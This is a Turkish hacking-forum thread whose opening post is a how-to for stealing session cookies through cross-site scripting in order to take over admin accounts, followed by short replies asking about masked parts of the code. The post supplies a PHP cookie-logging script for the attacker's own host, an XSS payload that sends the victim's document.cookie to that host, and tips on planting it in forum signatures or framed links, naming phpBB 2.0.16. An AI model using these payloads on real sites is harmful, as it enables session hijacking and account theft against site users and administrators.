İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

XSS cookie çalma

05-06-2009 10:26
#1
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.

Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.

COOKIE'Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.

En basitinden ********>javascript:alert(********.cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.


Örnek:

Basit yazılmış bir script ile cookie'nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.


Kod:
<?php $filename = getcwd()."\\loglarburaya.txt"; if(!file_exists($filename)){ touch($filename); chmod($filename, 0666); } if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } } echo "Log başarıyla girildi..."; fclose($handle); exit; } echo "Hani loglayacağımız parametre?"; exit;?>

Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie'yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.

Açıklamalar:

loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie'nin yazılabilmesi için mutlaka CHMOD'unun 777 yani yazma izinli olması gerekiyor.

Cookie'yi çalma kodu:


Kod:
********>window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>

Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
Örneğin elimizde www.xxx.com/oyun.asp?id

Biz bunu önceki verdiğim örnek kodla deniyoruz;
www.xxx.com/oyun.asp?id=********>javascript:alert(documen t.cookie);</script>

Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.

Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.


Kod:

Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. B
http://www.xxx.com/oyun.asp?id=********>window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>
u yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış..
Kullanıcı İmzası
qwertytyty Teşekkür etti.

02-09-2012 19:55
#2
Üyelik tarihi:
08/2012
Mesajlar:
78
Teşekkür (Etti):
5
Teşekkür (Aldı):
7
Konular:
13
Ticaret:
(0) %
Kodlarda ******** yazan yere ne yapıcaz bu konularda acemiyim de
Kullanıcı İmzası
~~SPY Programmer~~

Sadece Bir Teşekkür...
02-09-2012 20:39
#3
Majardoma - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Mesajlar:
373
Teşekkür (Etti):
4
Teşekkür (Aldı):
55
Konular:
72
Ticaret:
(0) %
daha önceden açıldı
Kullanıcı İmzası
Nazik olun, profesyonel davranın. Ama tanıştığınız herkesi öldürmek üzere bir planınız da olsun...
Mutlu ol yeter ki gittiğin yerde benden bir parça aşk olsun katre olsun yeşil gözlerinde. 1 ocak 1951-∞
02-09-2012 21:47
#4
Üyelik tarihi:
08/2012
Mesajlar:
78
Teşekkür (Etti):
5
Teşekkür (Aldı):
7
Konular:
13
Ticaret:
(0) %
******** buralara ne yazılacak biri anlatabilirmi?
Kullanıcı İmzası
~~SPY Programmer~~

Sadece Bir Teşekkür...
05-09-2012 16:35
#5
Üyelik tarihi:
08/2012
Mesajlar:
78
Teşekkür (Etti):
5
Teşekkür (Aldı):
7
Konular:
13
Ticaret:
(0) %
soruma cevap yokmu ? ******** buralara ne yazılacak biri anlatabilirmi?
Kullanıcı İmzası
~~SPY Programmer~~

Sadece Bir Teşekkür...
06-09-2012 21:36
#6
Üyelik tarihi:
07/2012
Nereden:
Türkiye
Mesajlar:
1.493
Teşekkür (Etti):
13
Teşekkür (Aldı):
150
Konular:
126
Ticaret:
(0) %
Evet öncedende duymuştum site admininin cookieleri bile çalınabiliyor
Kullanıcı İmzası
Ne Mutlu Türk'üm Diyene.!

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı